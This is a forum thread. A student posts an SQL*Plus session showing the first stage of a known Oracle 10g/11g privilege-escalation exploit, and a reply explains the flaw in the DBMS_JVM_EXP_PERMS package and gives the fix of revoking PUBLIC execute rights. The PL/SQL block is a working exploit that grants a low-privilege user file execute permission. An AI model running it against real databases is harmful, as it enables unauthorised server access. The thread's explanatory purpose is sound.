Results 1 to 2 of 2
  1. #1
    Join Date
    Mar 2010
    Posts
    1

    Question Unanswered: Can any one Explain what code does.

    I am trying to figure out what is going on with this code. I am doing a presentation for college but i have little experience with databases. This project is on the Zero day Hack of Oracle 11g and i need to explain what is happening in the following code. Thanks for the help.

    Code:
    SQL> CONNECT / AS SYSDBA 
    Connected. 
    SQL> CREATE USER GREMLIN IDENTIFIED BY GREMLIN; 
     
    User created. 
     
    SQL> GRANT CREATE SESSION TO GREMLIN; 
     
    Grant succeeded. 
     
    SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 
    'GREMLIN'; 
     
    no rows selected 
     
    SQL> CONNECT GREMLIN/GREMLIN 
    Connected. 
    SQL> DECLARE 
       POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; 
       CURSOR C1 IS SELECT 
    'GRANT','GREMLIN','SYS','java.io.FilePermission','<<ALL 
    FILES>>','execute','ENABLED' FROM DUAL;  
      BEGIN
      OPEN C1; 
      FETCH C1 BULK COLLECT INTO POL; 
      CLOSE C1; 
      DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); 
      END; 
      / 
     
    PL/SQL procedure successfully completed. 
     
    SQL> CONNECT / AS SYSDBA 
    Connected. 
    SQL> COL TYPE_NAME FOR A30; 
    SQL> COL NAME FOR A30; 
    SQL> COL ACTION FOR A10; 
    SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 
    'GREMLIN'; 
     
    TYPE_NAME                      NAME                           ACTION 
    ------------------------------ ------------------------------ ---------- 
    java.io.FilePermission         <<ALL FILES>>                  execute 
     
    SQL>

  2. #2
    Join Date
    Mar 2010
    Location
    Vienna, Austria
    Posts
    149
    It is the first part of the exploit of a bug in the default installation of Oracle 10g & 11g (execute permission on the DBMS_JVM_EXP_PERMS package is given to PUBLIC).

    It gives a user with nothing but the CREATE SESSION privilege the possibility to do file operations with the Oracle JVM on the server machine.

    This was introduced at the last blackhat conference by David Litchfield.

    (The solution is to revoke the execution privilege for the DBMS_JVM_EXP_PERMS - package from PUBLIC, which every responsible DBA should have done by now anyway ...)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •